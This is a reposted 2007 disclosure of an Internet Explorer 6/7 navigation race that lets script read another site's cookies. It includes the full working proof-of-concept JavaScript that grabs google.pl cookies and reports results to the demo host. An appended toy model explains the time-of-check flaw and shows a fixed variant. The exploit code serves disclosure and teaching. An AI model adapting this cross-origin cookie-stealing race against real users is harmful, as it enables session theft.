逆水寒 2007-6-12 21:48
MSIE bait & switch vulnerability demo
There is a funny vulnerability in Microsoft Internet Explorer versions 6 and 7.
In short, when JavaScript code instructs MSIE to navigate away from a page that meets the same-domain origin policy (and hence can be scriptually accessed and modified by the attacker) to an unrelated third-party site, there is a window of opportunity for concurrently executed JavaScript to perform actions with the permissions for the old page, but the actual content of the newly loaded page, for example: read or set victim.document.cookie, arbitrarily alter the document DOM, including changing form submission URLs, injecting code, or even crashing the browser due to memory corruption while reading and writing not fully initialized data structures.
In other words, the entire security model of the browser collapses like a house of cards and renders you vulnerable to a plethora of nasty attacks; and local system compromise is not out of the question, either.
The following harmless demo will attempt to snatch a cookie from google.pl and display it for you. It is somewhat dependent on network timing and similar factors, and you obviously need JavaScript to proceed, and you need to accept Google cookies. Tested on the most recent MSIE 6 & 7 as of this writing (June 3, 2007). No, Firefox is not vulnerable. No, I have no clue about Opera, Safari, Konqueror and whatnot.
The test code is as follows:
<script>
// Demo: keep navigating a victim window back and forth between an
// attacker-controlled page (same origin as this script) and google.pl,
// while polling nw.document.cookie the whole time. A vulnerable MSIE lets
// one of those reads through while the window still carries the old page's
// permissions but already holds google.pl's content.
var nw;                 // the victim window
var i1, i2, i3, fail;   // timer handles

// Call foobar() from a link or button on the hosting page to start the test.
function foobar() {
    // Open the victim window on a same-origin page so this script may touch it.
    nw = open("http://lcamtuf.coredump.cx/ierace/nothing.html", "victim");
    // Poll the victim's cookie as often as the browser allows.
    i1 = setInterval('winchecker()', 1);
    // Bait & switch: navigate the window to google.pl every 500 ms...
    i2 = setInterval("try { nw.location.href = 'http://www.google.pl/'; } catch (e) {} ", 500);
    // ...and back to the same-origin page on a different period (601 ms), so the
    // relative timing of the two navigations drifts on every cycle.
    i3 = setInterval("try { nw.location.href = 'http://lcamtuf.coredump.cx/ierace/nothing.html'; } catch (e) {} ", 601);
    // Give up after two minutes.
    fail = setTimeout("failure()", 120 * 1000);
}

function winchecker() {
    var x, log;
    try {
        // On a non-vulnerable browser this throws "Access is denied" whenever
        // google.pl's document is loaded; an empty string means the same-origin
        // page (which sets no cookies) is currently loaded.
        x = nw.document.cookie;
        if (x) {
            alert("Your google.pl cookie:\n\n" + x + "\n\nTest successful. Your browser is vulnerable.");
            nw.close();
            clearInterval(i1);
            clearInterval(i2);
            clearInterval(i3);
            clearTimeout(fail);
            // Report the outcome back to the demo host (statistics only).
            log = new XMLHttpRequest();
            log.open("GET", "http://lcamtuf.coredump.cx/ierace/log.cgi?success", false);
            log.send(null);
        }
    } catch (e) {}
}

function failure() {
    var log;
    clearInterval(i1);
    clearInterval(i2);
    clearInterval(i3);
    nw.close();
    alert("Failed to obtain cookie in 120 seconds.\n\n" +
          "Your browser might not be vulnerable, or your\n" +
          "network performance deviates from what this\n" +
          "script expects. Try again or give up.\n");
    log = new XMLHttpRequest();
    log.open("GET", "http://lcamtuf.coredump.cx/ierace/log.cgi?failure", false);
    log.send(null);
}
</script>
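The race the post describes (old page's permissions, new page's content) is a classic time-of-check/time-of-use flaw in how a security principal is bound to the object it protects. The following is an added illustration, not lcamtuf's demo and not Internet Explorer's real code: it is a toy model in which a window's security origin is cached separately from its document and updated in a later phase of navigation, beside a fixed variant that derives the origin from the very document object whose cookie is returned. The classes Document, BuggyWindow and FixedWindow, the two-phase navigate(), and the sample cookie value are all assumptions made for the illustration; the generator's yield points stand in for the moments at which other script gets to run mid-navigation.

```javascript
'use strict';
// Added example: a toy model of the bait & switch race, not MSIE's implementation.

function originOf(url) {
  return new URL(url).origin;
}

class Document {
  constructor(url, cookie) {
    this.url = url;
    this.cookie = cookie;  // constructed sample data, never a real cookie
  }
  get origin() {
    return originOf(this.url);
  }
}

// Vulnerable model: the window caches its security origin in a separate field.
// navigate() installs the new document first and only updates the cached origin
// in a later phase; between the two yields the check consults a stale principal.
class BuggyWindow {
  constructor(doc) {
    this.document = doc;
    this.securityOrigin = doc.origin;
  }
  *navigate(url, cookie) {
    this.document = new Document(url, cookie);   // content already swapped...
    yield 'content-swapped';
    this.securityOrigin = this.document.origin;  // ...permissions updated later
    yield 'principal-updated';
  }
  readCookie(callerOrigin) {
    if (callerOrigin !== this.securityOrigin) throw new Error('Access denied');
    return this.document.cookie;
  }
}

// Fixed model: navigate() is inherited unchanged; the check now takes the origin
// from the same document object whose cookie it is about to return, so content
// and permission cannot disagree no matter when the caller runs.
class FixedWindow extends BuggyWindow {
  readCookie(callerOrigin) {
    const doc = this.document;
    if (callerOrigin !== doc.origin) throw new Error('Access denied');
    return doc.cookie;
  }
}

// Attacker script from the origin the window started on: attempt a cookie read
// at every point where it gets to run during the navigation.
function raceNavigation(win, attackerOrigin, targetUrl, targetCookie) {
  const observed = [];
  for (const phase of win.navigate(targetUrl, targetCookie)) {
    try {
      observed.push(phase + ': ' + win.readCookie(attackerOrigin));
    } catch (e) {
      observed.push(phase + ': ' + e.message);
    }
  }
  return observed;
}

// Assumed setup mirroring the demo above: window opened on the attacker's page,
// then navigated to google.pl. The cookie value is constructed.
const ATTACKER_ORIGIN = 'http://lcamtuf.coredump.cx';
const START_PAGE = 'http://lcamtuf.coredump.cx/ierace/nothing.html';
const TARGET = 'http://www.google.pl/';
const SAMPLE_COOKIE = 'PREF=constructed-sample-value';

function demo(WindowClass) {
  const win = new WindowClass(new Document(START_PAGE, ''));
  return raceNavigation(win, ATTACKER_ORIGIN, TARGET, SAMPLE_COOKIE);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('buggy:', demo(BuggyWindow));
  console.log('fixed:', demo(FixedWindow));
}
```

Running it prints the buggy window leaking the google.pl cookie in the content-swapped phase and denying it once the principal catches up, while the fixed window denies both reads. The design point carries beyond browsers: whenever a permission check reads a cached principal rather than the object it guards, any multi-step state transition between the two opens exactly this window.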